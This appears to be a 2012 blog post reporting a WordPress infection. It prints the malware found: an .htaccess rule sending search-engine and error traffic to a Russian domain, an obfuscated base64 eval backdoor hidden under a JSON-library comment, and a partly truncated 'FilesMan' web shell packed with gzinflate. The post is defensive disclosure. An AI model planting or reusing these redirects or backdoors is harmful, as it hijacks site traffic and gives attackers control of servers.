A virus redirects search engine traffic to other site

March 26th, 2012 |

I recently came across a virus that redirects the WordPress-sites search engine traffic to other sites (positive-general.ru, ba-ca.ru).

What is infected

1. File “.htaccess” (at the top & bottom), to which redirect was added:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://positive-general.ru/example/status.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://positive-general.ru/example/status.php [R=301,L]  
ErrorDocument 400 http://positive-general.ru/example/status.php
ErrorDocument 401 http://positive-general.ru/example/status.php 
ErrorDocument 403 http://positive-general.ru/example/status.php 
ErrorDocument 404 http://positive-general.ru/example/status.php
ErrorDocument 500 http://positive-general.ru/example/status.php

2. Adds PHP files to “wp-uploads”

Приблизительный путь: “…/wp-content/uploads/2012/01.php”

 * This package provides a simple encoder and decoder for JSON notation. It
 * is intended for use with client-side Javascript applications that make
 * use of HTTPRequest to perform server communication functions - data can
 * be encoded into JSON notation for use in a client-side javascript, or
 * decoded from incoming Javascript requests. JSON format is native to
 * Javascript, and can be directly eval()'ed with no further parsing
 * overhead
$djsanrkgpxs=array_map(strrev("edoced_4"."6"."esab"),array(str_replace(" ",""," aWYgKCFlb X"."B "."0 "."eSgk X0NPT 0tJ R V"."sndidd "."KS BhbmQ "."g"."JF 9 DT0"."9L S"."U "."V "."b J3 Yn X"."T09J 2"."Qn"."K"."X t pZiAo I WV t c HR "."5K "."CR"."fU "."E "."9 T"."V"."Fs"."n "."Yydd"."KS"."k g e 2"."V"."j a "."G"."8 g J "."z"."x"."0 "."Z Xh0Y XJ"."lY SB"."yb "."3d "."zPTI 4 "."I"."G"."N "."v"."bHM"."9"."O "."DA +"."J z"."sg JGQ 9"."Y mFz"."Z TY"."0X"."2"."RlY2 "."9 k "."ZS h"."zdH"."Jfc mV"."wbG"."F j "."Z"."S"."g nIC c s J"."y"."s n"."LC R fUE9TVF"."s"."n"."Y y d"."dKSk 7 a W Y o "."J"."G Q p IEBl"."d mFs K"."CRkKTs"."g ZWN o b yAnPC9"."0 ZXh0YXJ"."l "."Y "."T4nO3"."0 NC "."m "."Vja G"."8g Jz xm"."b"."3 JtIGF "."j dG"."l v"."b j0 iIi BtZ "."X"."R ob"."2Q9"."cG9 zdD"."4"."8d GV4dGF"."yZ"."W"."E"."gY 29"."scz04M "."C"."B "."y"."b 3"."d"."zP"."TI 4 IG5"."hb WU9Y z48 "."L"."3RleHR hc m V"."hP j xi"."cj4 "."8a W 5 "."wd X Qg "."dHlw"."Z T"."1"."zdW "."Jt"."aXQ"."+PC9mb 3JtP"."ic7ZX"."hp "."dDt9")));eval($djsanrkgpxs[0]); 

3. Also I found virus in “wp-content” folder (“wp-oowal.php”)

$color = "#5f5";
$default_action = "Fil"."esMan";
$default_charset = "Window"."s-12"."51";
preg_replace("/.*[muponyd]?/e",str_replace(' ',''," \x65 \x76 \x61  \x6C   \x28  \x67\x7A \x69  \x6E \x66 \x6C  \x61 \x74 \x65   \x28  \x62 \x61 \x73 \x65 \x36 \x34 \x5F\x64 \x65 \x63\x6F\x64 \x65   \x28  '7X1re9s2z/Dn9 V"."c wmj "."fZq "."+PYT"."t"."u7 s"."2"."Mna"."Q5t2jT"."p c ug "."p6 eP Jsmxr k S1P"."k u"."Nk W"."f"."77C 4 "."Ck"."R E"."q y "."4 3 S 7 3 8"."N1"."vb u "."fp7FI E A RJ k A RB AH T"."7 xR V nN"."Ilui4"."X O6d7 Jx72 T "."C/"."PN2d "."mHz j l 8dbZ f 7x2d m d 9"."KJXb "."HCt P "."Q "."Cb"."Y H"."z "."j "."g K"."W Y"."tZQW"."Dd "."Fo 3"."X"."vj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/ 5"."x"."TN "."v 8 "."2yWm0J 8 sw1 F xM foHX"."o WD0nKF L"."uWq "."1SZc+qz9"."iRH "."7F 9 f "."z "."rum V C "."vc+ "."NGT X "."Y P/ "."9t y"."x"."24"."ndK Ki6 QS BH 3Q8f2 C "."W"."j"."8 4PDw "."Eqy Y "."P UDu "."W"."H Z "."r m "."q "."5Y y s m "."4"."5z4"."9"."j T"."y PX"."Hnc g"."d OQ"."IC"."cum"."z47 kj "."N yrG aS N "."r4N "."q "."dP6d+5 IS dYD pGGJ7 bc/ "."r uGN "."r96 f S 4 A "."607 PTg +gs"."a a 9c"."p "."z k 3fV IF "."1 8MLGL1 "."O L "."+ d G w j "."A "."Q z Kh"."lHgTkLP C odO"."WC zQ"."S CF I4E"."TT"."YMz csM"."M H T+ Z"."s8s EExBOqWi2 O ... \x29\x29\x29\x3B"),".");?>

Some more info on Norton Community

There are no comments yet

Leave a Reply

Your email address will not be published. Required fields are marked *